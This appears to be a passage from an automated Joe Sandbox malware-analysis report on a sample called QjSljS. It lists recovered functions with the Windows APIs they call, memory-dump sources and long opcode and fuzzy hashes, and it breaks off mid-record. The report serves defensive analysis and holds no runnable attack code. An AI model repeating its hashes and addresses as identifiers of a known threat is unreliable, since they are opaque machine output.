                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 55ccc2b06b9b4d86bfc8189acb8fa8b8f8301031c3b18a2b699f5a81eceaad66
                                                                                                • Instruction ID: e37eee7684a61a67860d73f9641f6892e5c71e8b751791a99b64a24ba57e5e85
                                                                                                • Opcode Fuzzy Hash: 55ccc2b06b9b4d86bfc8189acb8fa8b8f8301031c3b18a2b699f5a81eceaad66
                                                                                                • Instruction Fuzzy Hash: 8821C4B5900248DFDB10CF9AD984ADEBBF9EB48320F14841AE918A7350D379A954CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B6A90 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 022B6B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 6ac2d87c92de3bed84537acad548e7732dc19426b81d26fcf2bf9e18270ade3d
                                                                                                • Instruction ID: d0352ffed7c56a6e8b55494c69d0e40784ea214b922354b233d33823cc0b39e6
                                                                                                • Opcode Fuzzy Hash: 6ac2d87c92de3bed84537acad548e7732dc19426b81d26fcf2bf9e18270ade3d
                                                                                                • Instruction Fuzzy Hash: A81147719102499FCB10DFAAD845AEEBFF5EF98320F248819E419A7250C7799941CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231B101,00000800,00000000,00000000), ref: 0231B312
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 727c125e8c233b5a587556fa03e8fe281b1a9814970b226fe9bba046075a1be7
                                                                                                • Instruction ID: 09812d3cd21ed6888add358cf827fb984939a137b8e8d548622aa5c6cc99db40
                                                                                                • Opcode Fuzzy Hash: 727c125e8c233b5a587556fa03e8fe281b1a9814970b226fe9bba046075a1be7
                                                                                                • Instruction Fuzzy Hash: FB1114B6900348DFDB14CF9AD444ADEFBF9EB48324F14842AE819A7201C379A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231B2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0231B101,00000800,00000000,00000000), ref: 0231B312
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 1c5234bba06f57e40b151006ac907d3c26c6a91dbfa84a5ba5ca578bb6a937e6
                                                                                                • Instruction ID: 435a59e3bb60ab9fb797f1fa3214fe00b2441c7ea557c7bb96d2b416085c2ddd
                                                                                                • Opcode Fuzzy Hash: 1c5234bba06f57e40b151006ac907d3c26c6a91dbfa84a5ba5ca578bb6a937e6
                                                                                                • Instruction Fuzzy Hash: C21123B6D00249CFDB14CFAAD884ADEFBF5EF88324F14851AE419A7640C379A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B66A9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 082aa15e3e349aa9e1977e76a66feb51e330a6ff69c75fb2f934b11a46bb46e5
                                                                                                • Instruction ID: 2a05267f9d545a412c78b4c34857680836e0019503ce514cee8d0674e6bd4d1e
                                                                                                • Opcode Fuzzy Hash: 082aa15e3e349aa9e1977e76a66feb51e330a6ff69c75fb2f934b11a46bb46e5
                                                                                                • Instruction Fuzzy Hash: F61158B5D102498EDB24DFAAC4457EFBBF9EF88324F24881AD419A7240C779A544CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B66B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: e713cdc26ea43d1656dcf7f6c3c6d5ff87b16a08cefe0711cd1f545fc1a197b7
                                                                                                • Instruction ID: 0b95656a0471ab2039d0140f6797b6b787d00b39a3a5f00b79c1464efcf71ebc
                                                                                                • Opcode Fuzzy Hash: e713cdc26ea43d1656dcf7f6c3c6d5ff87b16a08cefe0711cd1f545fc1a197b7
                                                                                                • Instruction Fuzzy Hash: CC113A71D002498FDB10DFAAC4457EEFBF9EF88324F248419D419A7240CB79A944CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B7CC8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 022B8C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: 18ca483fbe0ce5098ef80c6c8a9a700f8f70a68d36069265b2eeeac03d274417
                                                                                                • Instruction ID: c3410c8c432875b1125a95a3a5aee3878c27f56939d2681f422c5d648568a79d
                                                                                                • Opcode Fuzzy Hash: 18ca483fbe0ce5098ef80c6c8a9a700f8f70a68d36069265b2eeeac03d274417
                                                                                                • Instruction Fuzzy Hash: 691133B5810348DFDB10CF9AC844BDEBBF8EB48320F248819E918A7200C374A944CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0231B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0231B086
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 328ea86b95db0eb5f94f7470298810aca5508f2eaaafd2db6ea83d3367c8d646
                                                                                                • Instruction ID: 0e9fbbe88a81773343fdf5bbce548e7a439b827b1948a70afd1a3177b7a6bd33
                                                                                                • Opcode Fuzzy Hash: 328ea86b95db0eb5f94f7470298810aca5508f2eaaafd2db6ea83d3367c8d646
                                                                                                • Instruction Fuzzy Hash: 7A11DFB5C00749CFCB24DF9AD444ADEFBF5EB88324F14845AD429A7210C379A645CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 022B8BD1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 022B8C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: aeac6d72dc94c23b6d690f73d627f231a90b83394552c58ec6cf8ee9454f2670
                                                                                                • Instruction ID: 4234320c39d34141b818328a5892c76f90451135a695fe93ed5c95347528dbd3
                                                                                                • Opcode Fuzzy Hash: aeac6d72dc94c23b6d690f73d627f231a90b83394552c58ec6cf8ee9454f2670
                                                                                                • Instruction Fuzzy Hash: 411106B5800349DFCB10DF99D584BDEBBF8FB48320F148459D518A7610C374A544CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021CD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 79c3df667307abd1c57a9046f5226f82e075167ecfb782a14417a05c596a2095
                                                                                                • Instruction ID: 93aa0db2382a47110d074ecd707b3f51039db589bc9084417fb441a0b65de621
                                                                                                • Opcode Fuzzy Hash: 79c3df667307abd1c57a9046f5226f82e075167ecfb782a14417a05c596a2095
                                                                                                • Instruction Fuzzy Hash: F92136B9540200DFDB08DF04E9C0B26BF65FBA8314F34C57CEA090B646C336E406C6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021CD110 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c2f71ca925fd4a875679b8eb409ee61b561c59783f7a34a24d99c661385ee5e
                                                                                                • Instruction ID: 218b7c75712de4acddc3b1280e56ff1fa986a04fa40f882dd9958627037ebc79
                                                                                                • Opcode Fuzzy Hash: 2c2f71ca925fd4a875679b8eb409ee61b561c59783f7a34a24d99c661385ee5e
                                                                                                • Instruction Fuzzy Hash: 0621F1B9544240DFDB05DF14E9C0B26BFA6FBA8314F34857DE9090B346C336D416C6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70a45aa31bcfa7b9926eecb768627ab1aee085275c8a0fc3523ede69022ffd28
                                                                                                • Instruction ID: b3831dd3fe048f3385703c100ca895b01473590ad65d2bfa3e5cfcc8f5d0460e
                                                                                                • Opcode Fuzzy Hash: 70a45aa31bcfa7b9926eecb768627ab1aee085275c8a0fc3523ede69022ffd28
                                                                                                • Instruction Fuzzy Hash: 052104B2644240DFDB14DF24E9C0B26BBA5FBC8314F64C96DE90A4B246C33AD407CA61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c0ed220af1dbcd28561d3bc36ea11fc0a452274e16dbc1f30ccd028ce1773d00
                                                                                                • Instruction ID: d62106b73b2c1c86d35839b8ff4deaf63cef4f70764d8d8be9178178d1c5e5ec
                                                                                                • Opcode Fuzzy Hash: c0ed220af1dbcd28561d3bc36ea11fc0a452274e16dbc1f30ccd028ce1773d00
                                                                                                • Instruction Fuzzy Hash: 9C2138B2584200EFDB05DF54E9C0F26BBA5FB88314F24CA6DE94A4F252C33AD406CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021DD006 Relevance: .1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77fd929b8f634ba032e420fcecf5d21fa9648feb8b2b38d99144bc969e48ef80
                                                                                                • Instruction ID: 5bcd85ed78aa18b4205cb7ba904a5b2d36913f2882e2be999dfbdf5e1a660a6e
                                                                                                • Opcode Fuzzy Hash: 77fd929b8f634ba032e420fcecf5d21fa9648feb8b2b38d99144bc969e48ef80
                                                                                                • Instruction Fuzzy Hash: 6921C376549380CFDB12CF24D994B15BF71EB85214F28C5EAD8498B6A7C33AD40ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021CD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction ID: 9db8795374a6c5a5b303faa54c295c154aae12d2bdee3fba6c81ce40fa3b44ab
                                                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction Fuzzy Hash: CC11E176444280DFDB16CF00D9C0B16BF71FB94324F24C2ADD9094B656C33AE45ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021CD10B Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction ID: 0a6648a5091222a438ef0270ac3b88e589fbfeb333ef3489f56e6a68d1a8705b
                                                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                • Instruction Fuzzy Hash: 5811DC76544280CFCB12CF00E9C4B16BF72FB98324F2482ADD9094B756C33AD45ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                • Instruction ID: 023bd9c4debfcca6e666a5e085b8596e36c4784332488370e514565089f1cb33
                                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                • Instruction Fuzzy Hash: 2611DD76544280DFDB12CF10D5C0B15FBB1FB84314F24C6ADD8494B696C33AD40ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:0%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 60911 1472b60 LdrInitializeThunk

                                                                                                Executed Functions

                                                                                                Function 01472C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 1472c0a-1472c0f 1 1472c11-1472c18 0->1 2 1472c1f-1472c26 LdrInitializeThunk 0->2
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0148FD4F,000000FF,00000024,01526634,00000004,00000000,?,-00000018,7D810F61,?,?,01448B12,?,?,?,?), ref: 01472C24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                                                                • Instruction ID: f35058fb3e0eca0567f11708145e7cdb4a23cd3968f33c0a570972cb542fc60d
                                                                                                • Opcode Fuzzy Hash: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                                                                • Instruction Fuzzy Hash: 8AB09B719015C5C9DA11F7644608B1B790577E0701F55C063D3030657F4778C1D1E275
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 8 14735c0-14735cc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                                                                • Instruction ID: 2fe684c59a95232b8fab28181f4f66796a23ded1e89a3efa322ec85a59db2225
                                                                                                • Opcode Fuzzy Hash: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                                                                • Instruction Fuzzy Hash: 1C90023160550502D1007158455470A600697E0301FA5C412A042456DDC7A58A5166A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01472B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 4 1472b60-1472b6c LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(014A0DBD,?,?,?,?,01494302), ref: 01472B6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                                                                • Instruction ID: 6a48c740830651ba71fb3843b0dae1561d2cf6b1a46a809a983d1384fe53946f
                                                                                                • Opcode Fuzzy Hash: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                                                                • Instruction Fuzzy Hash: 349002612024010341057158445461A900B97F0301B95C022E1014595DC63589916225
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01472DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 7 1472df0-1472dfc LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(014AE73E,0000005A,0150D040,00000020,00000000,0150D040,00000080,01494A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0147AE00), ref: 01472DFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                                                                • Instruction ID: 0e39e6b9294f95f18bce7c457b3e2a1cea512539961eeff31a91f9c68ce3209d
                                                                                                • Opcode Fuzzy Hash: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                                                                • Instruction Fuzzy Hash: 4B90023120140513D1117158454470B500A97E0341FD5C413A042455DDD7668A52A221
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01472C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6 1472c70-1472c7c LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0142FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01487BE5,00001000,00004000,000000FF,?,00000000), ref: 01472C7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
